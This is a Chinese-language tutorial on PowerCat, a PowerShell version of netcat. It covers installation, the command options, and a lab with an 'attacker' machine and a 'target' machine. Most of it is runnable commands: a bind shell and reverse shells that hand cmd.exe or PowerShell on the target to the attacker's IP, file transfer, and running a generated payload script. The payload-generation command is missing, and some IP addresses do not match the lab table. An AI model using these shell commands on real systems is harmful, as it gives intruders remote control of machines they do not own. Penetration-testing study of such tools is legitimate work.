PowerCat介绍
PowerCat是一个powershell写的tcp/ip瑞士军刀,可以看成ncat的powershell的实现,然后里面也 加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
PowerCat安装
1、下载地址
https://github.com/besimorhino/powercat
2、下载下来导入
Import-Module .\powercat.ps1
3、如果提示未能加载指定模块,或运行不了则可能是权限问题,通过管理员权限打开powershell,输入如下代码
Set-ExecutionPolicy Unrestricted
4、输入如下命令可以查看帮助信息 powercat -h
5、如下就是安装成功
PowerCat命令
-l监听连接
-c连接到侦听器
-p要连接或监听的端口
-e执行 -ep执行Powershell
-r中继。格式:“-r tcp:10.1.1.1:443”
-u通过UDP传输数据
-dns通过dns传输数据
-dnsft DNS故障阈值
-t超时选项。默认值:60
-I输入:文件路径(字符串),字节数组或字符串
-o控制台输出类型:“主机”,“字节”或“字符串”
-of输出文件路径
-d连接后断开连接
-rep中继器。断开连接后重新启动
-g生成有效载荷
-ge生成编码的有效载荷
-h打印帮助消息
PowerCat实验环境简介
| 机器名称 | 机器IP |
| 攻击机 | 192.168.14.137 |
| 靶机 | 192.168.14.131 |
PowerCat和nc正向连接
1、靶机使用powercat执行以下命令
powercat -l -p 8080 -e cmd.exe -v
2、攻击机使用nc执行以下命令po
nc 192.168.14.131 8080 -vv
3、查看返回结果
PowerCat和nc反向连接
1、靶机使用powercat执行以下命令
powercat -c 192.168.14.137 -p 8888 -v -e cmd.exe
2、攻击机使用nc执行以下命令
nc -l -p 8888 -vv
3、查看返回结果
PowerCat和PowerCat反向连接
1、靶机使用powercat执行以下命令
powercat -c 192.168.14.137 -p 9999 -v -ep
2、攻击机使用powercat执行以下命令
powercat -l -p 9999 -v
3、查看返回结果
PowerCat文件传输
1、靶机使用powercat执行以下命令
powercat -l -p 9999 -of test.txt -v
2、攻击机使用powercat执行以下命令
powercat -c 192.168.3.10 -p 9999 -i D:test.txt -v
3、查看返回结果
用powercat生成payload
1、攻击机使用powercat执行以下命令生成payload
2、攻击机使用powercat执行以下命令连接
powercat -c 192.168.3.10 -p 8000 -v
3、在靶机上运行脚本
.\shell.ps1
4、查看运行结果
